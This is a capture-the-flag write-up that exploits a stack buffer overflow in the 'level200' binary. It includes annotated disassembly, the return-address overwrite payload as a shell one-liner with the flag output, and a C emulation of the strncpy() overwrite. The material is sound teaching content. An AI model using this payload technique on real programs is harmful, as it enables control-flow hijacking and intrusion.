Exploitation 300 is also an ELF 64-bit LSB executable. The vulnerability is a classic stack buffer overflow: we have to overwrite the saved $rip with the address of the cat_key function, which prints the flag. The binary uses strncpy() to copy data into a buffer at $rbp-0x110, and the problem is that we control both of the other strncpy() arguments: the source pointer, argv[atoi(argv[1])], and the number of bytes to copy, atoi(argv[2]). Neither value is checked against the 0x110-byte buffer before the call.
0x00000000004006a6 <+61>:  callq  0x400550 <atoi@plt>        // atoi(argv[1])
0x00000000004006ab <+66>:  mov    %eax,-0x8(%rbp)             // return value: index, kept at rbp-0x8
0x00000000004006ae <+69>:  mov    -0x120(%rbp),%rax           // argv
0x00000000004006b5 <+76>:  add    $0x10,%rax
0x00000000004006b9 <+80>:  mov    (%rax),%rax                 // argv[2]
0x00000000004006bc <+83>:  mov    %rax,%rdi
0x00000000004006bf <+86>:  mov    $0x0,%eax
0x00000000004006c4 <+91>:  callq  0x400550 <atoi@plt>        // atoi(argv[2])
0x00000000004006c9 <+96>:  mov    %eax,-0x4(%rbp)             // return value: count, kept at rbp-0x4
0x00000000004006cc <+99>:  mov    -0x4(%rbp),%eax
0x00000000004006cf <+102>: movslq %eax,%rdx                   // rdx = count (third strncpy argument)
0x00000000004006d2 <+105>: mov    -0x8(%rbp),%eax
0x00000000004006d5 <+108>: cltq
0x00000000004006d7 <+110>: shl    $0x3,%rax                   // shl by 3, ie %rax * 2^3, ie %rax * 8 (pointer-sized stride)
0x00000000004006db <+114>: add    -0x120(%rbp),%rax           // &argv[index]: points into the argv array based on argv[1]
0x00000000004006e2 <+121>: mov    (%rax),%rcx
0x00000000004006e5 <+124>: lea    -0x110(%rbp),%rax           // destination buffer
0x00000000004006ec <+131>: mov    %rcx,%rsi                   // rsi = argv[index] (source)
0x00000000004006ef <+134>: mov    %rax,%rdi                   // rdi = buffer (destination)
0x00000000004006f2 <+137>: callq  0x400560 <strncpy@plt>

(gdb) p/x &cat_key
$1 = 0x400654

The buffer starts at $rbp-0x110, so 272 bytes fill it, 280 bytes also overwrite the saved $rbp, and 288 bytes would overwrite the whole saved $rip. The saved $rip is the return address into __libc_start_main, an address of the form 0x00007fffxxxxxxxx, so its two highest bytes are already zero. Writing only the six low bytes of cat_key's address, 0x400654, is therefore enough, which gives a copy of 280 + 6 = 286 bytes. Passing 3 as argv[1] makes argv[3] the source string, and 286 as argv[2] the count. So this is our final payload:
$ /levels/level200/level200 3 286 `python -c 'print "A"*280+"\x54\x06\x40\x00\x00\x00"'`
You entred : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT @ key is : b9240c45d606dc90d0df83f9818b59cd
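One detail worth spelling out is why a count of 286 works at all: an argv entry is a C string, so the trailing \x00 bytes of the payload cannot actually reach the program (bash drops NUL bytes from command substitution). What saves the exploit is strncpy() itself, which pads the destination with NULs up to the requested count whenever the source is shorter than the count. The following C program is an added example, not code from the original write-up or from the level200 binary: it rebuilds main()'s frame layout from the disassembly above (0x110-byte buffer, saved $rbp, saved $rip), builds argv[3] as the shell really delivers it (280 filler bytes plus only the three non-zero bytes of 0x400654), and emulates the strncpy() call with several counts. The 0x00007fff00c0ffee return address is a constructed stand-in for the real return into __libc_start_main, and a little-endian x86-64 layout is assumed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame layout taken from the disassembly: the destination buffer is at
 * rbp-0x110, the saved rbp sits at rbp and the return address at rbp+8. */
#define BUF_SIZE      0x110            /* 272 */
#define SAVED_RBP_OFF BUF_SIZE         /* 272 */
#define SAVED_RIP_OFF (BUF_SIZE + 8)   /* 280 */
#define FRAME_SIZE    (BUF_SIZE + 16)  /* 288 */

#define CAT_KEY_ADDR  0x400654ULL      /* (gdb) p/x &cat_key */
/* Constructed stand-in for the real return address into __libc_start_main;
 * only its shape (0x00007fffxxxxxxxx, top two bytes zero) matters here. */
#define FAKE_RET_ADDR 0x00007fff00c0ffeeULL

/* Builds argv[3] as the shell actually hands it to the program: 280 filler
 * bytes followed by the little-endian target address cut at its first zero
 * byte, because an argv entry is a C string and cannot carry embedded NULs.
 * Returns the strlen() of the result (283 for cat_key). */
size_t build_argv_payload(unsigned char *out, size_t cap, uint64_t target)
{
    size_t n = 0;
    if (cap < SAVED_RIP_OFF + 8 + 1)
        return 0;
    memset(out, 'A', SAVED_RIP_OFF);
    n = SAVED_RIP_OFF;
    for (int i = 0; i < 8; i++) {
        unsigned char b = (unsigned char)(target >> (8 * i));
        if (b == 0)
            break;                       /* the shell would drop this and everything after it */
        out[n++] = b;
    }
    out[n] = '\0';
    return n;
}

/* Emulates strncpy(rbp-0x110, src, count) against a fake frame whose
 * return-address slot initially holds FAKE_RET_ADDR, and returns the value
 * left in that slot. Counts beyond the emulated frame are refused. */
uint64_t emulate_overflow(const char *src, size_t count)
{
    unsigned char frame[FRAME_SIZE];
    uint64_t rbp = 0x00007fffdeadbee0ULL, rip = FAKE_RET_ADDR;

    if (count > FRAME_SIZE)
        return 0;
    memset(frame, 0, sizeof frame);
    memcpy(frame + SAVED_RBP_OFF, &rbp, sizeof rbp);
    memcpy(frame + SAVED_RIP_OFF, &rip, sizeof rip);

    /* strncpy() copies at most count bytes and, when src is shorter than
     * count, pads the remainder with NULs: that padding supplies the zero
     * bytes the shell could not pass in argv. */
    strncpy((char *)frame, src, count);

    memcpy(&rip, frame + SAVED_RIP_OFF, sizeof rip);
    return rip;
}

/* Length of the argv[3] string the shell delivers for cat_key. */
size_t payload_length(void)
{
    unsigned char payload[FRAME_SIZE + 1];
    return build_argv_payload(payload, sizeof payload, CAT_KEY_ADDR);
}

/* Builds the cat_key payload and runs the copy with the given argv[2] count. */
uint64_t saved_rip_after(size_t count)
{
    unsigned char payload[FRAME_SIZE + 1];
    build_argv_payload(payload, sizeof payload, CAT_KEY_ADDR);
    return emulate_overflow((const char *)payload, count);
}

int main(void)
{
    size_t counts[] = { 280, 283, 286, 288 };

    printf("argv[3] is %zu bytes long (280 filler + 3 address bytes)\n",
           payload_length());
    for (size_t i = 0; i < sizeof counts / sizeof counts[0]; i++)
        printf("count %3zu -> saved rip = 0x%016llx\n", counts[i],
               (unsigned long long)saved_rip_after(counts[i]));
    return 0;
}
```

A count of 280 stops short of the return address and leaves it intact; 283 copies the three address bytes but nothing more, so the slot becomes the half-and-half value 0x00007fff00400654 and the program crashes instead of reaching cat_key; 286 (the value used above) or 288 let strncpy()'s NUL padding clear the middle bytes, and the two highest bytes were zero to begin with, so the slot ends up as exactly 0x400654.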